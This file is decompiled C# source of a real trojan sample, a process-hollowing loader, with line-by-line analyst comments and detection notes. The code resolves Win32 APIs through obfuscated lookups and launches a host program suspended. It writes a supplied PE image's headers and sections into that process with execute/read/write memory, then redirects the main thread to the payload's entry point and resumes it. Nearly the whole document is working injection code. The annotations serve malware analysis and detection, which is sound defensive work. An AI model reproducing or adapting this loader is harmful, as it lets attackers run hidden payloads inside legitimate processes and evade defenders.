MalwareSourceCode/MSIL/Trojan/Win32/I/Trojan.Win32.Inject.ancbn-87991063fbeea430cdbe9586022ccd45abc0d3ca50af32983044f034c3072515/.cs

// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Ressource, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7A61D5AB-B799-4526-BF58-A6DA1297213F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Inject.ancbn-87991063fbeea430cdbe9586022ccd45abc0d3ca50af32983044f034c3072515.exe
using System;
using System.Runtime.InteropServices;
// Analyst summary: this class is a loader. Its one public method takes a PE file as a byte array,
// starts another program in a suspended state, writes the PE's headers and sections into that
// process, redirects the main thread's context and resumes it. That sequence is the pattern
// catalogued as process hollowing (MITRE ATT&CK T1055.012).
// All identifiers are obfuscated to private-use code points. The Win32 names used in the comments
// below are inferred from the delegate parameter names the decompiler kept and from struct layouts;
// they are not spelled out anywhere in this file and should be confirmed against the sample.
// Detection-relevant points visible here: the API names are not present as literals (they come from
// \uE00B.\uE000(int), defined outside this file), so a string search for API names will miss them;
// only GetProcAddress and GetModuleHandle appear as P/Invoke imports. At run time the observable
// chain is: suspended process creation, cross-process allocation with protection value 0x40 at a
// fixed base, cross-process writes, thread-context change, resume (process-tampering telemetry such
// as Sysmon Event ID 25 is aimed at this kind of image replacement).
internal class \uE00A
{
// kernel32!GetProcAddress, renamed; used to resolve every other API at run time.
[DllImport("kernel32", EntryPoint = "GetProcAddress")]
private static extern IntPtr \uE000(IntPtr _param0, string _param1);
// kernel32!GetModuleHandle, renamed; supplies the module handle passed to GetProcAddress.
[DllImport("kernel32", EntryPoint = "GetModuleHandle")]
private static extern IntPtr \uE000(string _param0);
// Entry point of the loader.
//   _param0: raw bytes of the PE image to be written into the new process.
//   _param1: passed as lpCommandLine to the process-creation delegate.
//   _param2: passed as lpApplicationName to the process-creation delegate (the host program).
// Returns nothing; most API results are stored in unused locals (num1..num8) and never checked.
public static void \uE000(byte[] _param0, string _param1, string _param2)
{
\uE00A.\uE017 obj = new \uE00A.\uE017();
ref \uE00A.\uE017 local1 = ref obj;
\uE00A.\uE01B structure1 = new \uE00A.\uE01B();
ref \uE00A.\uE01B local2 = ref structure1;
\uE00A.\uE01E structure2 = new \uE00A.\uE01E();
ref \uE00A.\uE01E local3 = ref structure2;
\uE00A.\uE014 lpStartupInfo = new \uE00A.\uE014();
\uE00A.\uE015 lpProcessInformation = new \uE00A.\uE015();
\uE00A.\uE01D lpContext = new \uE00A.\uE01D();
// First field of the startup-info struct is set to the struct's own size (the usual cb field).
lpStartupInfo.\uE000 = (uint) Marshal.SizeOf((object) lpStartupInfo);
// 65543 = 0x10007, the same value as \uE011.\uE008; on x86 this is CONTEXT_FULL.
lpContext.\uE000 = 65543U;
// The payload address is taken as a 32-bit integer, so the code assumes a 32-bit process.
GCHandle gcHandle = GCHandle.Alloc((object) _param0, GCHandleType.Pinned);
int int32 = gcHandle.AddrOfPinnedObject().ToInt32();
gcHandle.Free();
// Parse the start of the payload as a DOS header, then the NT headers at the offset held in its
// last field (\uE012, which lines up with e_lfanew).
obj = (\uE00A.\uE017) Marshal.PtrToStructure((IntPtr) int32, typeof (\uE00A.\uE017));
structure1 = (\uE00A.\uE01B) Marshal.PtrToStructure((IntPtr) (int32 + obj.\uE012), typeof (\uE00A.\uE01B));
// 17744 = 0x4550 ("PE") and 23117 = 0x5A4D ("MZ"): bail out unless the payload is a PE file.
if (structure1.\uE000 != 17744U || obj.\uE000 != (ushort) 23117)
return;
// Seven APIs are resolved dynamically as GetProcAddress(GetModuleHandle(moduleName), apiName).
// Both strings come from \uE00B.\uE000(index), which is not part of this file. Six lookups use
// module string 60; the second uses module string 88.
// NOTE(review): presumably 60 is kernel32 and 88 is ntdll - confirm by decoding the string table.
// Delegate \uE009: signature matches CreateProcess (parameter names preserved below).
\uE00A.\uE009 forFunctionPointer1 = (\uE00A.\uE009) Marshal.GetDelegateForFunctionPointer(\uE00A.\uE000(\uE00A.\uE000(\uE00B.\uE000(60)), \uE00B.\uE000(73)), typeof (\uE00A.\uE009));
// Delegate \uE00B: (hProcess, lpBaseAddress); consistent with an unmap-view call - TODO confirm.
\uE00A.\uE00B forFunctionPointer2 = (\uE00A.\uE00B) Marshal.GetDelegateForFunctionPointer(\uE00A.\uE000(\uE00A.\uE000(\uE00B.\uE000(88)), \uE00B.\uE000(98)), typeof (\uE00A.\uE00B));
// Delegate \uE00C: parameters match a cross-process virtual allocation (VirtualAllocEx-style).
\uE00A.\uE00C forFunctionPointer3 = (\uE00A.\uE00C) Marshal.GetDelegateForFunctionPointer(\uE00A.\uE000(\uE00A.\uE000(\uE00B.\uE000(60)), \uE00B.\uE000(119)), typeof (\uE00A.\uE00C));
// Delegate \uE00A: parameters match WriteProcessMemory.
\uE00A.\uE00A forFunctionPointer4 = (\uE00A.\uE00A) Marshal.GetDelegateForFunctionPointer(\uE00A.\uE000(\uE00A.\uE000(\uE00B.\uE000(60)), \uE00B.\uE000(134)), typeof (\uE00A.\uE00A));
// Delegates \uE00D / \uE00E: (hThread, ref context); read and write of a thread context.
\uE00A.\uE00D forFunctionPointer5 = (\uE00A.\uE00D) Marshal.GetDelegateForFunctionPointer(\uE00A.\uE000(\uE00A.\uE000(\uE00B.\uE000(60)), \uE00B.\uE000(153)), typeof (\uE00A.\uE00D));
\uE00A.\uE00E forFunctionPointer6 = (\uE00A.\uE00E) Marshal.GetDelegateForFunctionPointer(\uE00A.\uE000(\uE00A.\uE000(\uE00B.\uE000(60)), \uE00B.\uE000(170)), typeof (\uE00A.\uE00E));
// Delegate \uE00F: (hThread) returning uint; matches ResumeThread.
\uE00A.\uE00F forFunctionPointer7 = (\uE00A.\uE00F) Marshal.GetDelegateForFunctionPointer(\uE00A.\uE000(\uE00A.\uE000(\uE00B.\uE000(60)), \uE00B.\uE000(187)), typeof (\uE00A.\uE00F));
// Create the host process with creation flag \uE010.\uE009 = 4 (CREATE_SUSPENDED): its main thread
// does not run until the resume call at the end. The result is not checked.
int num1 = forFunctionPointer1(_param2, _param1, IntPtr.Zero, IntPtr.Zero, false, \uE00A.\uE010.\uE009, IntPtr.Zero, (string) null, ref lpStartupInfo, out lpProcessInformation) ? 1 : 0;
// Called on the new process handle with the payload's preferred image base (optional-header field
// \uE009), before anything is allocated there.
int num2 = forFunctionPointer2(lpProcessInformation.\uE000, (IntPtr) (long) structure1.\uE002.\uE009) ? 1 : 0;
// Allocate \uE013 (lines up with SizeOfImage) bytes at that base in the new process.
// Allocation type 0x1000 | 0x2000 (commit + reserve), protection 0x40 (execute/read/write).
// This is the only call whose failure stops the routine; the suspended process is left behind.
if (!forFunctionPointer3(lpProcessInformation.\uE000, (IntPtr) (long) structure1.\uE002.\uE009, structure1.\uE002.\uE013, \uE00A.\uE013.\uE000 | \uE00A.\uE013.\uE001, \uE00A.\uE012.\uE002))
return;
// Copy the PE headers (\uE014 lines up with SizeOfHeaders) from the payload to the image base.
int num3 = forFunctionPointer4(lpProcessInformation.\uE000, (IntPtr) (long) structure1.\uE002.\uE009, _param0, structure1.\uE002.\uE014, (object) null) ? 1 : 0;
// One iteration per section; the count is file-header field \uE001 (NumberOfSections position).
for (int index1 = 0; index1 <= (int) structure1.\uE001.\uE001 - 1; ++index1)
{
// Section headers are read back-to-back starting right after the NT headers.
structure2 = (\uE00A.\uE01E) Marshal.PtrToStructure((IntPtr) (int32 + obj.\uE012 + Marshal.SizeOf((object) structure1) + Marshal.SizeOf((object) structure2) * index1), typeof (\uE00A.\uE01E));
// \uE003 is used as the byte count and \uE004 as the file offset of the section's raw data
// (positions of SizeOfRawData and PointerToRawData). Values come straight from the payload.
byte[] lpBuffer = new byte[(IntPtr) structure2.\uE003];
for (int index2 = 0; index2 <= (int) structure2.\uE003 - 1; ++index2)
lpBuffer[index2] = _param0[(long) structure2.\uE004 + (long) index2];
// Write the section at image base + \uE002 (position of VirtualAddress) in the new process.
int num4 = forFunctionPointer4(lpProcessInformation.\uE000, (IntPtr) (long) (structure1.\uE002.\uE009 + structure2.\uE002), lpBuffer, structure2.\uE003, (object) null) ? 1 : 0;
}
// Read the suspended main thread's register context.
int num5 = forFunctionPointer5(lpProcessInformation.\uE001, ref lpContext) ? 1 : 0;
// Write the 4-byte image base into the new process at (context field \uE00E) + 8.
// NOTE(review): \uE00E lines up with Ebx in the x86 CONTEXT layout; the target of this write
// is presumably the image-base field of the process environment block - confirm.
byte[] bytes = BitConverter.GetBytes(structure1.\uE002.\uE009);
int num6 = forFunctionPointer4(lpProcessInformation.\uE000, (IntPtr) (long) (lpContext.\uE00E + 8U), bytes, (uint) bytes.Length, (object) null) ? 1 : 0;
// Context field \uE011 (Eax position) is set to image base + optional-header field \uE006
// (AddressOfEntryPoint position), i.e. the payload's entry point.
lpContext.\uE011 = structure1.\uE002.\uE009 + structure1.\uE002.\uE006;
// Apply the modified context and let the thread run.
int num7 = forFunctionPointer6(lpProcessInformation.\uE001, ref lpContext) ? 1 : 0;
int num8 = (int) forFunctionPointer7(lpProcessInformation.\uE001);
}
// Managed signature used for the process-creation call (parameter names as in CreateProcess).
private delegate bool \uE009(
string lpApplicationName,
string lpCommandLine,
IntPtr lpProcessAttributes,
IntPtr lpThreadAttributes,
bool bInheritHandles,
\uE00A.\uE010 dwCreationFlags,
IntPtr lpEnvironment,
string lpCurrentDirectory,
ref \uE00A.\uE014 lpStartupInfo,
out \uE00A.\uE015 lpProcessInformation);
// Managed signature used for cross-process memory writes. lpNumberOfBytesWritten is typed as
// object and every caller in this class passes null for it.
private delegate bool \uE00A(
IntPtr hProcess,
IntPtr lpBaseAddress,
byte[] lpBuffer,
uint nSize,
object lpNumberOfBytesWritten);
// Two-argument call on (process handle, base address); used once, before the allocation.
private delegate bool \uE00B(IntPtr hProcess, IntPtr lpBaseAddress);
// Managed signature used for the cross-process allocation. Declared as returning bool, so the
// caller only learns whether the result was non-zero, not the address.
private delegate bool \uE00C(
IntPtr hProcess,
IntPtr lpAddress,
uint dwSize,
\uE00A.\uE013 flAllocationType,
\uE00A.\uE012 flProtect);
// Reads a thread context into the struct passed by reference.
private delegate bool \uE00D(IntPtr hThread, ref \uE00A.\uE01D lpContext);
// Writes a thread context; the struct is marshalled as input only ([In]).
private delegate bool \uE00E(IntPtr hThread, [In] ref \uE00A.\uE01D lpContext);
// Resumes a thread; the uint result is cast to int and discarded by the caller.
private delegate uint \uE00F(IntPtr hThread);
// Values match the Win32 process creation flags. Only \uE009 = 4 (CREATE_SUSPENDED) is used in
// this class.
private enum \uE010 : uint
{
\uE00C = 1,
\uE00B = 2,
\uE009 = 4,
\uE00D = 8,
\uE002 = 16, // 0x00000010
\uE003 = 512, // 0x00000200
\uE00A = 1024, // 0x00000400
\uE007 = 2048, // 0x00000800
\uE008 = 4096, // 0x00001000
\uE00F = 65536, // 0x00010000
\uE005 = 262144, // 0x00040000
\uE00E = 524288, // 0x00080000
\uE000 = 16777216, // 0x01000000
\uE006 = 33554432, // 0x02000000
\uE001 = 67108864, // 0x04000000
\uE004 = 134217728, // 0x08000000
}
// Values match the x86 CONTEXT flag constants (0x10000 base). No member is referenced by name in
// this class; the method above uses the literal 65543 (same value as \uE008) instead.
private enum \uE011 : uint
{
\uE000 = 65536, // 0x00010000
\uE001 = 65536, // 0x00010000
\uE002 = 65537, // 0x00010001
\uE003 = 65538, // 0x00010002
\uE004 = 65540, // 0x00010004
\uE008 = 65543, // 0x00010007
\uE005 = 65544, // 0x00010008
\uE006 = 65552, // 0x00010010
\uE007 = 65568, // 0x00010020
\uE009 = 65599, // 0x0001003F
}
// Values match the Win32 memory-protection constants. Only \uE002 = 0x40
// (PAGE_EXECUTE_READWRITE) is used in this class.
private enum \uE012 : uint
{
\uE004 = 1,
\uE005 = 2,
\uE006 = 4,
\uE007 = 8,
\uE000 = 16, // 0x00000010
\uE001 = 32, // 0x00000020
\uE002 = 64, // 0x00000040
\uE003 = 128, // 0x00000080
\uE008 = 256, // 0x00000100
\uE009 = 512, // 0x00000200
\uE00A = 1024, // 0x00000400
}
// Values match the Win32 allocation-type constants. \uE000 = 0x1000 (MEM_COMMIT) and
// \uE001 = 0x2000 (MEM_RESERVE) are the two used in this class.
private enum \uE013 : uint
{
\uE000 = 4096, // 0x00001000
\uE001 = 8192, // 0x00002000
\uE002 = 524288, // 0x00080000
\uE005 = 1048576, // 0x00100000
\uE006 = 2097152, // 0x00200000
\uE004 = 4194304, // 0x00400000
\uE003 = 536870912, // 0x20000000
}
// Startup-info struct passed to process creation; field order matches STARTUPINFO.
// Only \uE000 (size) is set by the code above.
private struct \uE014
{
public uint \uE000;
public string \uE001;
public string \uE002;
public string \uE003;
public uint \uE004;
public uint \uE005;
public uint \uE006;
public uint \uE007;
public uint \uE008;
public uint \uE009;
public uint \uE00A;
public uint \uE00B;
public short \uE00C;
public short \uE00D;
public IntPtr \uE00E;
public IntPtr \uE00F;
public IntPtr \uE010;
public IntPtr \uE011;
}
// Output of process creation; field order matches PROCESS_INFORMATION.
// \uE000 is used above as the process handle and \uE001 as the thread handle.
private struct \uE015
{
public IntPtr \uE000;
public IntPtr \uE001;
public uint \uE002;
public uint \uE003;
}
// Not referenced anywhere in this class.
// NOTE(review): the (int, IntPtr, bool) shape resembles SECURITY_ATTRIBUTES - confirm.
private struct \uE016
{
public int \uE000;
public IntPtr \uE001;
public bool \uE002;
}
// DOS header of the payload; field order matches IMAGE_DOS_HEADER.
// \uE000 is compared with 0x5A4D ("MZ") and \uE012 is used as the offset of the NT headers.
private struct \uE017
{
public ushort \uE000;
public ushort \uE001;
public ushort \uE002;
public ushort \uE003;
public ushort \uE004;
public ushort \uE005;
public ushort \uE006;
public ushort \uE007;
public ushort \uE008;
public ushort \uE009;
public ushort \uE00A;
public ushort \uE00B;
public ushort \uE00C;
public ushort \uE00D;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
public ushort[] \uE00E;
public ushort \uE00F;
public ushort \uE010;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)]
public ushort[] \uE011;
public int \uE012;
}
// COFF file header; field order matches IMAGE_FILE_HEADER.
// \uE001 is used above as the section count.
private struct \uE018
{
public ushort \uE000;
public ushort \uE001;
public uint \uE002;
public uint \uE003;
public uint \uE004;
public ushort \uE005;
public ushort \uE006;
}
// Pair of uints used as the element type of the 16-entry array at the end of \uE01A
// (shape of IMAGE_DATA_DIRECTORY). Not read by the code above.
private struct \uE019
{
public uint \uE000;
public uint \uE001;
}
// Optional header; field order matches the 32-bit IMAGE_OPTIONAL_HEADER.
// Fields read above: \uE006 (entry-point RVA position), \uE009 (image-base position),
// \uE013 (image-size position), \uE014 (headers-size position).
private struct \uE01A
{
public ushort \uE000;
public byte \uE001;
public byte \uE002;
public uint \uE003;
public uint \uE004;
public uint \uE005;
public uint \uE006;
public uint \uE007;
public uint \uE008;
public uint \uE009;
public uint \uE00A;
public uint \uE00B;
public ushort \uE00C;
public ushort \uE00D;
public ushort \uE00E;
public ushort \uE00F;
public ushort \uE010;
public ushort \uE011;
public uint \uE012;
public uint \uE013;
public uint \uE014;
public uint \uE015;
public ushort \uE016;
public ushort \uE017;
public uint \uE018;
public uint \uE019;
public uint \uE01A;
public uint \uE01B;
public uint \uE01C;
public uint \uE01D;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
public \uE00A.\uE019[] \uE01E;
}
// NT headers: signature (\uE000, compared with 0x4550 "PE"), file header, optional header.
private struct \uE01B
{
public uint \uE000;
public \uE00A.\uE018 \uE001;
public \uE00A.\uE01A \uE002;
}
// Embedded in the thread-context struct as field \uE007; seven uints, an 80-byte array and a
// trailing uint, which is the shape of the x86 floating-point save area. Not read directly.
private struct \uE01C
{
public uint \uE000;
public uint \uE001;
public uint \uE002;
public uint \uE003;
public uint \uE004;
public uint \uE005;
public uint \uE006;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 80)]
public byte[] \uE007;
public uint \uE008;
}
// Thread context; field order matches the 32-bit x86 CONTEXT structure.
// Fields touched above: \uE000 (flags, set to 0x10007), \uE00E (Ebx position, read),
// \uE011 (Eax position, overwritten with the payload entry point).
private struct \uE01D
{
public uint \uE000;
public uint \uE001;
public uint \uE002;
public uint \uE003;
public uint \uE004;
public uint \uE005;
public uint \uE006;
public \uE00A.\uE01C \uE007;
public uint \uE008;
public uint \uE009;
public uint \uE00A;
public uint \uE00B;
public uint \uE00C;
public uint \uE00D;
public uint \uE00E;
public uint \uE00F;
public uint \uE010;
public uint \uE011;
public uint \uE012;
public uint \uE013;
public uint \uE014;
public uint \uE015;
public uint \uE016;
public uint \uE017;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)]
public byte[] \uE018;
}
// Section header; field order matches IMAGE_SECTION_HEADER (8-byte name first).
// Fields read above: \uE002 (virtual-address position), \uE003 (raw-size position),
// \uE004 (raw-data file-offset position).
private struct \uE01E
{
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]
public byte[] \uE000;
public uint \uE001;
public uint \uE002;
public uint \uE003;
public uint \uE004;
public uint \uE005;
public uint \uE006;
public ushort \uE007;
public ushort \uE008;
public uint \uE009;
}
}